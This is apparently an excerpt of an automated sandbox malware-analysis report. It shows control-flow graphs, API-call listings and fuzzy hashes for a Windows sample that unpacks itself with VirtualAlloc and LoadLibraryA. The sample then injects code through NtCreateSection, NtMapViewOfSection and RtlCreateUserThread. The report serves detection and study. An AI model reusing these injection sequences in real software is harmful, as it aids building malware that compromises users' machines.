VirtualProtect 4547->4548 4550 2c4030b 4548->4550 4549 2c40439 VirtualFree 4553 2c404be LoadLibraryA 4549->4553 4550->4549 4552 2c408c7 4553->4552 4555 2c40223 4554->4555 4556 2c40d90 4555->4556 4557 2c40dad 4556->4557 4558 2c40238 VirtualAlloc 4557->4558 4559 2c40dbb GetPEB 4557->4559 4558->4547 4559->4558 4560 402eba 4562 402ecc 4560->4562 4561 402f54 4562->4561 4564 40193e 4562->4564 4565 40194f 4564->4565 4566 401991 Sleep 4565->4566 4567 4019ac 4566->4567 4569 4019bd 4567->4569 4570 401553 4567->4570 4569->4561 4571 401563 4570->4571 4572 401608 NtDuplicateObject 4571->4572 4576 4018dd 4571->4576 4573 401625 NtCreateSection 4572->4573 4572->4576 4574 4016a5 NtCreateSection 4573->4574 4575 40164b NtMapViewOfSection 4573->4575 4574->4576 4578 4016d1 4574->4578 4575->4574 4577 40166e NtMapViewOfSection 4575->4577 4576->4569 4577->4574 4582 40168c 4577->4582 4578->4576 4579 4016db NtMapViewOfSection 4578->4579 4579->4576 4580 401702 NtMapViewOfSection 4579->4580 4580->4576 4581 401724 4580->4581 4581->4576 4584 401729 4581->4584 4582->4574 4585 40172b 4584->4585 4590 401724 4584->4590 4586 4016be NtCreateSection 4585->4586 4585->4590 4587 4016d1 4586->4587 4586->4590 4588 4016db NtMapViewOfSection 4587->4588 4587->4590 4589 401702 NtMapViewOfSection 4588->4589 4588->4590 4589->4590 4590->4576

      Executed Functions

      Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 208nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 85 401553-4015b2 call 4011cd 97 4015b4 85->97 98 4015b7-4015bc 85->98 97->98 100 4015c2-4015d3 98->100 101 4018df-4018e7 98->101 104 4015d9-401602 100->104 105 4018dd 100->105 101->98 106 4018ec-40193b call 4011cd 101->106 104->105 114 401608-40161f NtDuplicateObject 104->114 105->106 114->105 115 401625-401649 NtCreateSection 114->115 118 4016a5-4016cb NtCreateSection 115->118 119 40164b-40166c NtMapViewOfSection 115->119 118->105 122 4016d1-4016d5 118->122 119->118 121 40166e-40168a NtMapViewOfSection 119->121 121->118 125 40168c-4016a2 121->125 122->105 123 4016db-4016fc NtMapViewOfSection 122->123 123->105 126 401702-40171e NtMapViewOfSection 123->126 125->118 126->105 128 401724 126->128 128->105 131 401724 call 401729 128->131 131->105
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 6d46c8a6fce290316f39b6869c298df5b0ebc69594c79ab5c6b7b5b864eca8fa
      • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
      • Opcode Fuzzy Hash: 6d46c8a6fce290316f39b6869c298df5b0ebc69594c79ab5c6b7b5b864eca8fa
      • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
      Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 132 40156b-4015b2 call 4011cd 144 4015b4 132->144 145 4015b7-4015bc 132->145 144->145 147 4015c2-4015d3 145->147 148 4018df-4018e7 145->148 151 4015d9-401602 147->151 152 4018dd 147->152 148->145 153 4018ec-40193b call 4011cd 148->153 151->152 161 401608-40161f NtDuplicateObject 151->161 152->153 161->152 162 401625-401649 NtCreateSection 161->162 165 4016a5-4016cb NtCreateSection 162->165 166 40164b-40166c NtMapViewOfSection 162->166 165->152 169 4016d1-4016d5 165->169 166->165 168 40166e-40168a NtMapViewOfSection 166->168 168->165 172 40168c-4016a2 168->172 169->152 170 4016db-4016fc NtMapViewOfSection 169->170 170->152 173 401702-40171e NtMapViewOfSection 170->173 172->165 173->152 175 401724 173->175 175->152 178 401724 call 401729 175->178 178->152
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: d3862df6149cc6d9473f3846e0a5cef4746480e6edce1058660ec2639c81cc0b
      • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
      • Opcode Fuzzy Hash: d3862df6149cc6d9473f3846e0a5cef4746480e6edce1058660ec2639c81cc0b
      • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
      Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 179 401561-4015b2 call 4011cd 189 4015b4 179->189 190 4015b7-4015bc 179->190 189->190 192 4015c2-4015d3 190->192 193 4018df-4018e7 190->193 196 4015d9-401602 192->196 197 4018dd 192->197 193->190 198 4018ec-40193b call 4011cd 193->198 196->197 206 401608-40161f NtDuplicateObject 196->206 197->198 206->197 207 401625-401649 NtCreateSection 206->207 210 4016a5-4016cb NtCreateSection 207->210 211 40164b-40166c NtMapViewOfSection 207->211 210->197 214 4016d1-4016d5 210->214 211->210 213 40166e-40168a NtMapViewOfSection 211->213 213->210 217 40168c-4016a2 213->217 214->197 215 4016db-4016fc NtMapViewOfSection 214->215 215->197 218 401702-40171e NtMapViewOfSection 215->218 217->210 218->197 220 401724 218->220 220->197 223 401724 call 401729 220->223 223->197
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: c037a065b71caf94a0fa6c09a6d83b4137dfe21335f97c9ee716951ac1d37583
      • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
      • Opcode Fuzzy Hash: c037a065b71caf94a0fa6c09a6d83b4137dfe21335f97c9ee716951ac1d37583
      • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
      Function 0040156F Relevance: 10.7, APIs: 7, Instructions: 172nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 224 40156f-4015b2 call 4011cd 232 4015b4 224->232 233 4015b7-4015bc 224->233 232->233 235 4015c2-4015d3 233->235 236 4018df-4018e7 233->236 239 4015d9-401602 235->239 240 4018dd 235->240 236->233 241 4018ec-40193b call 4011cd 236->241 239->240 249 401608-40161f NtDuplicateObject 239->249 240->241 249->240 250 401625-401649 NtCreateSection 249->250 253 4016a5-4016cb NtCreateSection 250->253 254 40164b-40166c NtMapViewOfSection 250->254 253->240 257 4016d1-4016d5 253->257 254->253 256 40166e-40168a NtMapViewOfSection 254->256 256->253 260 40168c-4016a2 256->260 257->240 258 4016db-4016fc NtMapViewOfSection 257->258 258->240 261 401702-40171e NtMapViewOfSection 258->261 260->253 261->240 263 401724 261->263 263->240 266 401724 call 401729 263->266 266->240
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: b43ab6a5ae3b26584acf886c72f61fec6545de2c9739d40d58a61617a66ea401
      • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
      • Opcode Fuzzy Hash: b43ab6a5ae3b26584acf886c72f61fec6545de2c9739d40d58a61617a66ea401
      • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
      Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 267 401583-4015b2 call 4011cd 276 4015b4 267->276 277 4015b7-4015bc 267->277 276->277 279 4015c2-4015d3 277->279 280 4018df-4018e7 277->280 283 4015d9-401602 279->283 284 4018dd 279->284 280->277 285 4018ec-40193b call 4011cd 280->285 283->284 293 401608-40161f NtDuplicateObject 283->293 284->285 293->284 294 401625-401649 NtCreateSection 293->294 297 4016a5-4016cb NtCreateSection 294->297 298 40164b-40166c NtMapViewOfSection 294->298 297->284 301 4016d1-4016d5 297->301 298->297 300 40166e-40168a NtMapViewOfSection 298->300 300->297 304 40168c-4016a2 300->304 301->284 302 4016db-4016fc NtMapViewOfSection 301->302 302->284 305 401702-40171e NtMapViewOfSection 302->305 304->297 305->284 307 401724 305->307 307->284 310 401724 call 401729 307->310 310->284
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 1e91f4c09bcacef1392eeaa703420aa8b20b57299c6afd06cd755880f7f169b4
      • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
      • Opcode Fuzzy Hash: 1e91f4c09bcacef1392eeaa703420aa8b20b57299c6afd06cd755880f7f169b4
      • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
      Function 00401587 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 311 401587-4015b2 call 4011cd 315 4015b4 311->315 316 4015b7-4015bc 311->316 315->316 318 4015c2-4015d3 316->318 319 4018df-4018e7 316->319 322 4015d9-401602 318->322 323 4018dd 318->323 319->316 324 4018ec-40193b call 4011cd 319->324 322->323 332 401608-40161f NtDuplicateObject 322->332 323->324 332->323 333 401625-401649 NtCreateSection 332->333 336 4016a5-4016cb NtCreateSection 333->336 337 40164b-40166c NtMapViewOfSection 333->337 336->323 340 4016d1-4016d5 336->340 337->336 339 40166e-40168a NtMapViewOfSection 337->339 339->336 343 40168c-4016a2 339->343 340->323 341 4016db-4016fc NtMapViewOfSection 340->341 341->323 344 401702-40171e NtMapViewOfSection 341->344 343->336 344->323 346 401724 344->346 346->323 349 401724 call 401729 346->349 349->323
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 17ba237f8dee9763ec0b09a09ce7a307427fbde3e710961389b3aebbe6aa507a
      • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
      • Opcode Fuzzy Hash: 17ba237f8dee9763ec0b09a09ce7a307427fbde3e710961389b3aebbe6aa507a
      • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24
      Function 00401729 Relevance: 4.7, APIs: 3, Instructions: 179nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 350 401729 351 40172b 350->351 352 40172f-40174d 350->352 351->352 353 40172d 351->353 365 401764 352->365 366 401755-401778 352->366 353->352 355 4016be-4016cb NtCreateSection 353->355 357 4016d1-4016d5 355->357 358 4018dd-40193b call 4011cd 355->358 357->358 360 4016db-4016fc NtMapViewOfSection 357->360 360->358 363 401702-40171e NtMapViewOfSection 360->363 363->358 368 401724 363->368 365->366 376 40177b-4017b8 366->376 368->358 371 401724 call 401729 368->371 371->358 392 4017ba-4017e3 376->392 397 4017e5-4017eb 392->397 398 4017ed 392->398 399 4017f3-4017f9 397->399 398->399 400 401809-40180d 399->400 401 4017fb-401807 399->401 400->399 402 40180f-401814 400->402 401->400 403 401816 call 40181b 402->403 404 40187c-40188b 402->404 406 40188e-401891 404->406 407 401893-40189d 406->407 408 4018bb-4018d4 406->408 409 4018a0-4018a9 407->409 408->358 410 4018b7 409->410 411 4018ab-4018b5 409->411 410->409 412 4018b9 410->412 411->410 412->406
      APIs
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create
      • String ID:
      • API String ID: 33071139-0
      • Opcode ID: d7ffac209591ce09f7b22c4e86819d2404e8050f733b4d1493b8ea105d7330e7
      • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
      • Opcode Fuzzy Hash: d7ffac209591ce09f7b22c4e86819d2404e8050f733b4d1493b8ea105d7330e7
      • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B
      Function 00403005 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 413 403005-403029 414 40315c-403161 413->414 415 40302f-403047 413->415 415->414 416 40304d-40305e 415->416 417 403060-403069 416->417 418 40306e-40307c 417->418 418->418 419 40307e-403085 418->419 420 4030a7-4030ae 419->420 421 403087-4030a6 419->421 422 4030d0-4030d3 420->422 423 4030b0-4030cf 420->423 421->420 424 4030d5-4030d8 422->424 425 4030dc 422->425 423->422 424->425 426 4030da 424->426 425->417 427 4030de-4030e3 425->427 426->427 427->414 428 4030e5-4030e8 427->428 428->414 429 4030ea-403159 RtlCreateUserThread NtTerminateProcess 428->429 429->414
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateProcessTerminateThreadUser
      • String ID:
      • API String ID: 1921587553-0
      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
      • Instruction ID: 9349ae55c142a47270c9c73eabb89239111d3cd47c98212c67b606f4e0ccd907
      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
      • Instruction Fuzzy Hash: C5412531218E088FD7A8EF6CA88576377D5F798311F6643AAE809D3389EA34DC5187C5
      Function 02C4003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 2c4003c-2c40047 1 2c4004c-2c40263 call 2c40a3f call 2c40e0f call 2c40d90 VirtualAlloc 0->1 2 2c40049 0->2 17 2c40265-2c40289 call 2c40a69 1->17 18 2c4028b-2c40292 1->18 2->1 23 2c402ce-2c403c2 VirtualProtect call 2c40cce call 2c40ce7 17->23 20 2c402a1-2c402b0 18->20 22 2c402b2-2c402cc 20->22 20->23 22->20 29 2c403d1-2c403e0 23->29 30 2c403e2-2c40437 call 2c40ce7 29->30 31 2c40439-2c404b8 VirtualFree 29->31 30->29 33 2c405f4-2c405fe 31->33 34 2c404be-2c404cd 31->34 37 2c40604-2c4060d 33->37 38 2c4077f-2c40789 33->38 36 2c404d3-2c404dd 34->36 36->33 40 2c404e3-2c40505 36->40 37->38 43 2c40613-2c40637 37->43 41 2c407a6-2c407b0 38->41 42 2c4078b-2c407a3 38->42 51 2c40517-2c40520 40->51 52 2c40507-2c40515 40->52 44 2c407b6-2c407cb 41->44 45 2c4086e-2c408be LoadLibraryA 41->45 42->41 46 2c4063e-2c40648 43->46 48 2c407d2-2c407d5 44->48 50 2c408c7-2c408f9 45->50 46->38 49 2c4064e-2c4065a 46->49 53 2c40824-2c40833 48->53 54 2c407d7-2c407e0 48->54 49->38 55 2c40660-2c4066a 49->55 56 2c40902-2c4091d 50->56 57 2c408fb-2c40901 50->57 58 2c40526-2c40547 51->58 52->58 62 2c40839-2c4083c 53->62 59 2c407e4-2c40822 54->59 60 2c407e2 54->60 61 2c4067a-2c40689 55->61 57->56 63 2c4054d-2c40550 58->63 59->48 60->53 64 2c40750-2c4077a 61->64 65 2c4068f-2c406b2 61->65 62->45 66 2c4083e-2c40847 62->66 72 2c40556-2c4056b 63->72 73 2c405e0-2c405ef 63->73 64->46 67 2c406b4-2c406ed 65->67 68 2c406ef-2c406fc 65->68 69 2c40849 66->69 70 2c4084b-2c4086c 66->70 67->68 74 2c406fe-2c40748 68->74 75 2c4074b 68->75 69->45 70->62 76 2c4056d 72->76 77 2c4056f-2c4057a 72->77 73->36 74->75 75->61 76->73 80 2c4057c-2c40599 77->80 81 2c4059b-2c405bb 77->81 84 2c405bd-2c405db 80->84 81->84 84->63
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C4024D
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_2c40000_ifvwgru.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID: cess$kernel32.dll
      • API String ID: 4275171209-1230238691
      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
      • Instruction ID: 9c6c39d744e66da998234f7eafb144f198e58fe89f23fef007059eb5dcb8abaf
      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
      • Instruction Fuzzy Hash: 7D527974A01229DFDB64CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85DF15
      Function 02ECA271 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 430 2eca271-2eca28a 431 2eca28c-2eca28e 430->431 432 2eca295-2eca2a1 CreateToolhelp32Snapshot 431->432 433 2eca290 431->433 434 2eca2b1-2eca2be Module32First 432->434 435 2eca2a3-2eca2a9 432->435 433->432 436 2eca2c7-2eca2cf 434->436 437 2eca2c0-2eca2c1 call 2ec9f30 434->437 435->434 441 2eca2ab-2eca2af 435->441 442 2eca2c6 437->442 441->431 441->434 442->436
      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02ECA299
      • Module32First.KERNEL32(00000000,00000224), ref: 02ECA2B9
      Memory Dump Source
      • Source File: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EC3000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_2ec3000_ifvwgru.jbxd
      Yara matches
      Similarity
      • API ID: CreateFirstModule32SnapshotToolhelp32
      • String ID:
      • API String ID: 3833638111-0
      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction ID: ee703cd97d3473eed68c6dedf43a5d464c8be83eac8e7b8a023c0704afb73b18
      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction Fuzzy Hash: A0F0C2322407246BD7202FF9A98CB7A72ECAF49628F30553DF64A911C0DB71E8064B61
      Function 02C40E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 443 2c40e0f-2c40e24 SetErrorMode * 2 444 2c40e26 443->444 445 2c40e2b-2c40e2c 443->445 444->445
      APIs
      • SetErrorMode.KERNELBASE(00000400,?,?,02C40223,?,?), ref: 02C40E19
      • SetErrorMode.KERNELBASE(00000000,?,?,02C40223,?,?), ref: 02C40E1E
      Memory Dump Source
      • Source File: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_2c40000_ifvwgru.jbxd
      Yara matches
      Similarity
      • API ID: ErrorMode
      • String ID:
      • API String ID: 2340568224-0
      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
      • Instruction ID: 994b33df5fd358b2e7e35cf1cce9ee3a15b093092ac9ac22606117ff364d12c4
      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
      • Instruction Fuzzy Hash: 9AD0123114512877D7002A94DC09BCE7B1CDF05B66F008011FB0DD9080CB70964046E5
      Function 0040193E Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 446 40193e-401947 447 40195e 446->447 448 40194f-40195a 446->448 447->448 449 401961-4019ae call 4011cd Sleep call 401452 447->449 448->449 460 4019b0-4019b8 call 401553 449->460 461 4019bd-401a03 call 4011cd 449->461 460->461
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 63c6d220c0b2465f65230560b632e8fee6ee77bde0997471010d6e0ffaa45abb
      • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
      • Opcode Fuzzy Hash: 63c6d220c0b2465f65230560b632e8fee6ee77bde0997471010d6e0ffaa45abb
      • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
      Function 0040194A Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 475 40194a-4019ae call 4011cd Sleep call 401452 488 4019b0-4019b8 call 401553 475->488 489 4019bd-401a03 call 4011cd 475->489 488->489
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 5da34bb6d812b8abf119b9d3fe0d5b8ad3457d6c21a2f33bdd5f198c88081420
      • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
      • Opcode Fuzzy Hash: 5da34bb6d812b8abf119b9d3fe0d5b8ad3457d6c21a2f33bdd5f198c88081420
